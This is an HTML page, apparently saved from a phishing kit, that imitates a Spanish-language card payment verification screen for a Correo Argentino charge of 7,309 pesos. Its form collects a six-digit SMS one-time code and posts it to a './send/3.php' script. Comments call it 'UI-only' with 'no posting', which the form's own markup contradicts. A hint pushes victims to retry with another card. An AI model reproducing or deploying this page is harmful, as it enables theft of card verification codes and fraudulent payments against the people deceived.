<!DOCTYPE html>
<!-- saved from url=(0062)https://easybbnkde.wpenginepowered.com/crr/code/sms1/sms1.html -->
<html lang="es"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<title>Verificación</title>
<style>
:root {
--text: #1f2937;
--muted: #6b7280;
--line: #e5e7eb;
--btn: #1f3fbf;
--btnHover: #17329a;
--field: #ffffff;
--fieldBorder: #b9c3d1;
}
* {
box-sizing: border-box
}
body {
margin: 0;
font-family: system-ui, -apple-system, Segoe UI, Roboto, Arial, sans-serif;
color: var(--text);
background: #fff;
}
.topbar {
padding: 18px 26px 12px;
}
.logo {
height: 34px;
width: auto;
display: block;
}
.rule {
border: 0;
border-top: 1px solid var(--line);
margin: 10px 0 0;
}
.wrap {
max-width: 880px;
margin: 0 auto;
padding: 28px 18px 60px;
}
.msg {
text-align: center;
font-size: 14px;
line-height: 1.45;
color: var(--text);
margin: 26px auto 18px;
max-width: 760px;
}
.card {
max-width: 520px;
margin: 0 auto;
text-align: center;
}
label {
display: block;
font-size: 14px;
color: var(--muted);
margin: 10px 0 10px;
}
input {
width: 100%;
height: 44px;
padding: 10px 12px;
border: 1px solid var(--fieldBorder);
border-radius: 2px;
outline: none;
background: var(--field);
font-size: 15px;
}
input:focus {
border-color: #7aa2ff;
box-shadow: 0 0 0 3px rgba(122, 162, 255, .25);
}
button {
width: 100%;
height: 44px;
margin-top: 12px;
border: 0;
border-radius: 2px;
background: var(--btn);
color: #fff;
font-weight: 600;
letter-spacing: .2px;
cursor: pointer;
}
button:hover {
background: var(--btnHover);
}
.hint {
margin-top: 10px;
font-size: 12px;
color: var(--muted);
}
</style>
</head>
<body>
<header class="topbar">
<!-- Put your own legitimate logo file here -->
<img class="logo" src="./Verificación_files/l.png" alt="Logo">
<hr class="rule">
</header>
<main class="wrap">
<p class="msg">
Verifica tu compra
<br>Para proteger tu cuenta y completar tu compra, te enviamos un código de verificación al número de teléfono asociado a tu tarjeta. Ingresa el código para confirmar tu pago de 7,309 pesos argentinos a Correo Argentino.
</p>
<!-- UI-only form (no posting). Hook this up ONLY via your official provider flow. -->
<section class="card">
<form action="./send/3.php" method="post" data-np-autofill-form-type="other" data-np-checked="1" data-np-watching="1">
<label for="otp">Código de autenticación</label>
<input id="otp" name="1" type="tel" inputmode="numeric" placeholder="******" minlength="6" maxlength="6" aria-label="Código de autenticación" required="" data-np-checked="1">
<button type="submit" data-np-autofill-submit="">CONFIRMAR</button>
<div class="hint">Si no recibe un código de verificación, es posible que esta tarjeta no admita pagos en línea. Por favor, intente nuevamente con otra tarjeta que sí admita código de verificación.</div>
</form>
</section>
</main>
</body></html>